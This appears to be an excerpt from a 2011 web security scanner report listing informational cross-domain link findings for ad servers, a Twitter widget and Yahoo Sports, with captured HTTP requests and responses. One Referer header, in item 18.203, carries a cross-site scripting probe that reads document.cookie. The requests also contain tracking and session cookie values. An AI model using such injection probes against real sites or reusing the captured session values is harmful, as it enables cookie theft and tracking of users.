Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://pagead2.googlesyndication.com/pagead/ads?client=ca-google-hostednews-ap&format=300x250_as&output=html&h=250&w=300&region=article&ad_type=text&ea=0&color_bg=FFFFFF&color_border=0066CC&color_line=FFFFFF&color_link=003399&color_text=000000&color_url=008000&flash=10.3.181&hl=en&url=http%3A%2F%2Fwww.google.com%2Fhostednews%2Fap%2Farticle%2FALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%3FdocId%3D06bdeb4400a149318fc82f3f073766d1&adsafe=high&uiv=1&dt=1307962865316&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307962867980&dblk=1&frm=7&adk=1012086373&ga_vid=1102445186.1307962863&ga_sid=1307962863&ga_hid=401672175&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ifk=2196030948&loc=http%3A%2F%2Fwww.google.com%2Fhostednews%2Fap%2Farticle%2FALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%3FdocId%3D06bdeb4400a149318fc82f3f073766d1&fu=4&ifi=1&dtd=3140

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%253FdocId%253D06bdeb4400a149318fc82f3f073766d1%26hl%3Den%26client%3Dca-google-hostednews-ap%26adU%3Dwww.csnbayarea.com%26adT%3DVladimir%2BRadmanovic%26adU%3Dwww.csnchicago.com%26adT%3DLatest%2BCarlos%2BBoozer%2BNews%26adU%3DQuiznosQClub.com%26adT%3DFree%2BQuiznos%2BCoupons%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHUy_zFXRptMp1OuWq-ZKESGH5USQ

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:05:54 GMT
Server: cafe
Cache-Control: private
Content-Length: 11310
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#003399;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%253FdocId%253D06bdeb4400a149318fc82f3f073766d1%26hl%3Den%26client%3Dca-google-hostednews-ap%26adU%3Dwww.csnbayarea.com%26adT%3DVladimir%2BRadmanovic%26adU%3Dwww.csnchicago.com%26adT%3DLatest%2BCarlos%2BBoozer%2BNews%26adU%3DQuiznosQClub.com%26adT%3DFree%2BQuiznos%2BCoupons%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHUy_zFXRptMp1OuWq-ZKESGH5USQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png" width=78>
...[SNIP]...

18.200. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308394991&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C36845%2C45714%2C49027%2C59481%2C48153%2C18842%2C30364%2C48669%2C43937%2C48674%2C2083%2C32164%2C48070%2C47281%2C59306%2C199%2C32172%2C44336%2C1073%2C40626%2C44340%2C50398%2C45641%2C22328%2C49076%2C32190%2C32165%2C45643%2C50500%2C32326%2C45639%2C45640%2C1097%2C48203%2C48205%2C45837%2C48080%2C48675%2C22869%2C32345%2C32350%2C49317%2C44513%2C39397%2C44390%2C56551%2C40809%2C48618%2C48620%2C45677%2C32503%2C56817%2C45683%2C1150%2C48617%2C11262%2C9855

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1305508826+ \"4\": 1305981633}"; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICIxMTMiOiBbIkZRV1dDMlZLMkRXRiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDI3Ml19; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuGY/J5VgFHiQsPm9ywKjBoN27a+ZzFgtADzuWQ43k5kA8qehcp2Nm4Gy56Fyv5eCNI7Fyo7d/EOsCyYzyXBcfclC1B2xocGsOyMcyCTGSwYuEQ4ds5nFciS+PQeJMOgwQAWFeWY+YNFoJVZYtFpVOFdX1kEJjJKnFv+/x2y8CygGdcYJa68/IckLMJx9gWrALPEvqf3UEQ/vgI7dNcFFNFZG0Git74fRIgCAGMOVek="; io_freq_p1="eJzjEuZ4HCPAKHGhYfN7FgNGCzDNJc6xJB4oeBbEUWDQYABKnIVKXAgFSsxFkgCzuYQ5ngYAJWZ8aIBKMFgwcIlwbAsVOMAk8ek9quiPQIFWZolFp1FFbwUKTGSUOLf8/zuEqDDH5hgBZol9T++hCB4FOXnurgsogt3hQMFb3w8iBAHgcj64"; segments_p1="eJwdkMFKAmEUhdGZxc+sfLD29Qo9hriIJF3YqiiirE1EpM5CkVyFk0TkJsoCIVCjUFBaGMw00/3O5vBx7uWc+/+B71ZdL/DdOMmZPv7mTT87OLM3uDZFFxP0QdPI2HPppmElwgi12FfAWQIfLeDmLXwsp79GL4oEz2N4ZPueGziTiO3LJ2b3Ci9uGR7uYw/U3IvhUoqGGU77Gv54h5+b8IGuK2UENJzht3r2WvRkG6DeEiqrsYK/eui0pePk17roj1pHQ04a6vQbPbIy0z9oevqinzlBr2JK6gWT8ja5qj5X4l3ZCwK3M8kVXtvVpW/O+o/tlBvHu1TUk/w/jaxtDA=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 13 Jun 2011 11:03:11 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 13-Jun-2011 11:02:51 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 724

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308394991&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C36845%2C45714%2C49027%2C59481%2C48153%2C18842%2C30364%2C48669%2C43937%2C48674%2C2083%2C32164%2C48070%2C47281%2C59306%2C199%2C32172%2C44336%2C1073%2C40626%2C44340%2C50398%2C45641%2C22328%2C49076%2C32190%2C32165%2C45643%2C50500%2C32326%2C45639%2C45640%2C1097%2C48203%2C48205%2C45837%2C48080%2C48675%2C22869%2C32345%2C32350%2C49317%2C44513%2C39397%2C44390%2C56551%2C40809%2C48618%2C48620%2C45677%2C32503%2C56817%2C45683%2C1150%2C48617%2C11262%2C9855"/>');

18.201. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308395959&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C36845%2C45714%2C49027%2C59481%2C48153%2C18842%2C30364%2C48669%2C43937%2C48674%2C2083%2C32164%2C48070%2C47281%2C59306%2C199%2C32172%2C44336%2C1073%2C40626%2C44340%2C50398%2C45641%2C22328%2C49076%2C32190%2C32165%2C45643%2C50500%2C32326%2C45639%2C45640%2C1097%2C48203%2C48205%2C45837%2C48080%2C48675%2C22869%2C32345%2C32350%2C49317%2C44513%2C39397%2C44390%2C56551%2C40809%2C48618%2C48620%2C45677%2C32503%2C56817%2C45683%2C1150%2C48617%2C11262%2C9855

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1305508826+ \"4\": 1305981633}"; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICIxMTMiOiBbIkZRV1dDMlZLMkRXRiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDI3Ml19; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuGY/J5VgFHiQsPm9ywKjBoN27a+ZzFgtADzuWQ43k5kA8qehcp2Nm4Gy56Fyv5eCNI7Fyo7d/EOsCyYzyXBcfclC1B2xocGsOyMcyCTGSwYuEQ4ds5nFciS+PQeJMOgwQAWFeWY+YNFoJVZYtFpVOFdX1kEJjJKnFv+/x2y8CygGdcYJa68/IckLMJx9gWrALPEvqf3UEQ/vgI7dNcFFNFZG0Git74fRIgCAGMOVek="; io_freq_p1="eJzjEuZ4HCPAKHGhYfN7FgNGCzDNJc6xJB4oeBbEUWDQYABKnIVKXAgFSsxFkgCzuYQ5ngYAJWZ8aIBKMFgwcIlwbAsVOMAk8ek9quiPQIFWZolFp1FFbwUKTGSUOLf8/zuEqDDH5hgBZol9T++hCB4FOXnurgsogt3hQMFb3w8iBAHgcj64"; segments_p1="eJwdkMFKAmEUhdGZxc+sfLD29Qo9hriIJF3YqiiirE1EpM5CkVyFk0TkJsoCIVCjUFBaGMw00/3O5vBx7uWc+/+B71ZdL/DdOMmZPv7mTT87OLM3uDZFFxP0QdPI2HPppmElwgi12FfAWQIfLeDmLXwsp79GL4oEz2N4ZPueGziTiO3LJ2b3Ci9uGR7uYw/U3IvhUoqGGU77Gv54h5+b8IGuK2UENJzht3r2WvRkG6DeEiqrsYK/eui0pePk17roj1pHQ04a6vQbPbIy0z9oevqinzlBr2JK6gWT8ja5qj5X4l3ZCwK3M8kVXtvVpW/O+o/tlBvHu1TUk/w/jaxtDA=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 13 Jun 2011 11:19:19 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 13-Jun-2011 11:18:59 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 724

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308395959&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C36845%2C45714%2C49027%2C59481%2C48153%2C18842%2C30364%2C48669%2C43937%2C48674%2C2083%2C32164%2C48070%2C47281%2C59306%2C199%2C32172%2C44336%2C1073%2C40626%2C44340%2C50398%2C45641%2C22328%2C49076%2C32190%2C32165%2C45643%2C50500%2C32326%2C45639%2C45640%2C1097%2C48203%2C48205%2C45837%2C48080%2C48675%2C22869%2C32345%2C32350%2C49317%2C44513%2C39397%2C44390%2C56551%2C40809%2C48618%2C48620%2C45677%2C32503%2C56817%2C45683%2C1150%2C48617%2C11262%2C9855"/>');

18.202. http://platform0.twitter.com/widgets/follow_button.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform0.twitter.com
Path:	/widgets/follow_button.html

Issue detail

The page was loaded from a URL containing a query string:

http://platform0.twitter.com/widgets/follow_button.html?_=1307963467997&align=&button=blue&id=twitter_tweet_button_0&lang=en&link_color=ffffff&screen_name=dallasmavs&show_count=false&show_screen_name=&text_color=

The response contains the following link to another domain:

http://microformats.org/profile/hcard

Request

GET /widgets/follow_button.html?_=1307963467997&align=&button=blue&id=twitter_tweet_button_0&lang=en&link_color=ffffff&screen_name=dallasmavs&show_count=false&show_screen_name=&text_color= HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 03 Jun 2011 23:19:47 GMT
ETag: "316d5be7b9bf187a7b426f66963a909a"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 30500
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Date: Mon, 13 Jun 2011 11:20:26 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html><html><head><meta charset="utf-8"><title>Twitter For Websites: Follow Button</title><link rel="profile" href="http://microformats.org/profile/hcard"><style type="text/css">html{margin:0
...[SNIP]...

18.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:

http://showadsak.pubmatic.com/AdServer/AdServerServlet?operId=2&pubId=27438&siteId=27439&adId=22527&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=254264&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&frameName=http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439&kltstamp=2011-5-13%206%3A6%3A0&ranreq=0.2702138659078628&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=5x52&adVisibility=1

The response contains the following link to another domain:

http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=News

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27438&siteId=27439&adId=22527&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=254264&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&frameName=http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439&kltstamp=2011-5-13%206%3A6%3A0&ranreq=0.2702138659078628&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=5x52&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.2083.199.59306.22924.23954.49027.49076.22869.59481.22328.57145.18842.30364.13450.1150.; PMAT=3Ti5LKcVEDTzyhgOvr-betCmBK5yt1tldIGA_2X1uOnJM8F3howtaQw; PUBMDCID=2; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1648
Date: Mon, 13 Jun 2011 11:19:39 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Tue, 12-Jun-2012 11:19:32 GMT; path=/
Set-Cookie: pubfreq_27439_22527_1971237560=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:32 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 14-Jun-2011 11:19:32 GMT; path=/

document.write('<div id="http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439" style="position: absolute; margin: 0px 0px 0px 0px; height: 0p
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=News" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

18.204. http://sports.yahoo.com/nba/expertsarchive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sports.yahoo.com
Path:	/nba/expertsarchive

Issue detail

The page was loaded from a URL containing a query string:

http://sports.yahoo.com/nba/expertsarchive?author=Adrian+Wojnarowski

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?adv=23351&t=2
http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307964051305165&transactionID=1307964051305165
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307964051305165&transactionID=1307964051305165
http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js
http://basketballrecruiting.rivals.com/
http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ero654(gid$bnnZ.UwNdHGaXyrxTfXxcAB6rcHW80318pMAAPjF,st$1307964051090007,v$1.0))&t=J-D
http://data.nba.com/data/html/gdyn/gdyn_nba.html
http://footballrecruiting.rivals.com/
http://l.yimg.com/a/i/us/ext/rss4.gif
http://l.yimg.com/a/i/us/my/addtomyyahoo4.gif
http://l.yimg.com/a/i/us/sp/cn/headshots/adrian_wojnarowski.jpg
http://l.yimg.com/a/i/us/sp/p/yse_lo_70x24_2.gif
http://l.yimg.com/j/assets/css/v2_legacy.r163517;css/sports_shop.r143221;css/sitewide_nav_header_footer.r173434;css/player_search.r173429;css/search_assist/miniassist_200908201638.r156612;css/common/disclosure.r154189;css/social_buttons.r158641;css/common/ysp-mod/ysp-checkin.r166203.css?m
http://l.yimg.com/j/assets/eJx9kWFuhCAQhU-kooC46WEMi3RlVxjDQDfu6QvYJtq0_QV5883jMXPHZoum6WpRk3xbQE7aVxPYSn9oF2rfMtp17dv9CCpwTqtgwFXWuN8Z6YyV_yN3_L1Ka7qn-SpyMVCei6ilV_MoEQ2GJhXNfh07Qi5k6Ejb0-HoloJikC5gEnuWmOKygi8K43wovtf4eh3bgrzi2QYeRmdFDJxlZQarRwtTXHQmOaFDXzqNemh_7H0aN8HzqKACr8N8_reVTt7OnUp6iKiXoxaX00omg2oBjD6H61vByB7XWnDNhmuVIpZTzVo9yos9p-zyB2X0pVqNq4KXmb4lXJA0pIx7uZopf7UTrAztfdkg5jSCMloc10Vu2o_7ln6kHq8QAthv9RPVHctE.js?z&m
http://l.yimg.com/zz/combo?kx/ucs/uh/css/205/yunivhead-min.css&kx/ucs/uh/css/194/logo-min.css&kx/ucs/search/css/163/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css
http://rivals.com/
http://seatgeek.com/nba-tickets/?aid=14
http://thepostgame.com/
http://twitter.com/WojYahooNBA
http://www.citizensports.com/
http://www.grindtv.com/
http://www.grindtv.com/bike/
http://www.grindtv.com/moto/
http://www.grindtv.com/skate/
http://www.grindtv.com/snow/
http://www.grindtv.com/surf/
http://www.grindtv.com/wake/
http://www.rivals.com/
http://yahoosports.teamfanshop.com/
https://ad.yieldmanager.com/pixel?id=190534&t=2 width=1

Request

GET /nba/expertsarchive?author=Adrian+Wojnarowski HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:51 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 204496

<html>
<head>
<title>NBA - Adrian Wojnarowski Exclusive Analysis - Yahoo! Sports</title>
<meta name="description" content="Exclusive opinion and analysis by Adrian Wojnarowski.
" />
<style type='tex
...[SNIP]...
<div align="center">

<link type="text/css" rel="stylesheet" media="screen" href="http://l.yimg.com/j/assets/css/v2_legacy.r163517;css/sports_shop.r143221;css/sitewide_nav_header_footer.r173434;css/player_search.r173429;css/search_assist/miniassist_200908201638.r156612;css/common/disclosure.r154189;css/social_buttons.r158641;css/common/ysp-mod/ysp-checkin.r166203.css?m" />
